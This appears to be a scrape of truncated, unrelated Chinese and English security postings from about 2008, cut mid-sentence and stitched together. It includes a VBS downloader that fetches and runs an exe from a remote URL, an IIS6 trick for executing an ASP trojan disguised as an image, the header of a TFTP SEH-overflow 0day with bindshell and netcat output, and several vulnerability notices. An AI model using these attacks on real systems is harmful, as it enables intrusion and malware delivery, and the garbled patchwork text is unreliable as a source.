作者：Sowhat
来源：Sowhat的blog

前两天推荐过Mark Dowd的Paper “Exploiting Flash Reliably”
http://hi.baidu.com/secway/blog/item/242655971275376855fb96d8.html

学习了一下，很好很强大。为以后Flash Player漏洞的利用开辟了一条崭新崭新的道路啊。

简单来说，从Flash9开始，实现了一个ActionScript Virtual Machine (AVM)，这个虚拟机首先会验证将要被执行的ActionScript，然后再执行。未经验证的、不可信的ActionScript非常邪恶强大，几乎相当于以Flash Player运行的权限来执

Author:Tr4c3[dot]126[dot]com
版权所有 http://www.nspcn.org
#+++
影响版本：
沸腾展望新闻系统[核心:尘缘雅境] V1.1 Access版 Finish(SP3)
#+++
漏洞文件:
down.asp
#+++
关键代码：

Author:   Polymorphours
Email:   Polymorphours@whitecell.org

     经内部讨论后决定公布分析成果。

     4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的系统。 攻击者可随后安装程序；查看、更改或删除数据；或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2

来源：vbs小铺
以下代码保存成vbs，双击即可

On Error Resume Next
Exeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" )
url = "

Runs calc.exe on Office XP SP3 with updates < 03/11/08.

Just for fun...

http://milw0rm.com/sploits/2008-ms08-016.tgz

Marsupilamipowa@hotmail.fr

作者:rover
帮朋友检测网站的安全性，用的是SMSJ Version 8.0，号称仿阿里巴巴的东西，注册企业会员后，登录管理，发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩，想起早期动易的那个注册漏洞
说起这个漏洞，完全是iis6引起的，在iis6的站点上，建立一个xx.asp的文件夹，然后在里面放一个改成gif后缀的asp木马，照样会按asp来执行

#!/usr/bin/python # Quick TFTP Pro 2.1 SEH Overflow (0day) # Tested on Windows XP SP2. # Coded by Mati Aharoni # muts..at..offensive-security.com # http://www.offensive-security.com/0day/quick-tftp-poc.py.txt ######################################################### # bt ~ # quickftp.py # [*] Quick TFTP Pro 2.1 SEH Overflow (0day) # [*] http://www.offensive-security.com # [*] Sending evil packet, ph33r # [*] Check port 4444 for bindshell # bt ~ # nc -v 172.16.167.130 4444 # (UNKNOWN) [172.16.

零客网络安全小组www.0kee.com

程序名称：Cmsez Web Content Manage System v2.0.0
漏洞发现：小帥(小帅)
公布时间：08-03-14
漏洞影响：严重
漏洞文件：comments.php viewimg.php
官方站点：http://www.cmsez.com/
漏洞代码：

---------------

<?
//comments
include "mainfile.php";
$art=new article();
//设定
$con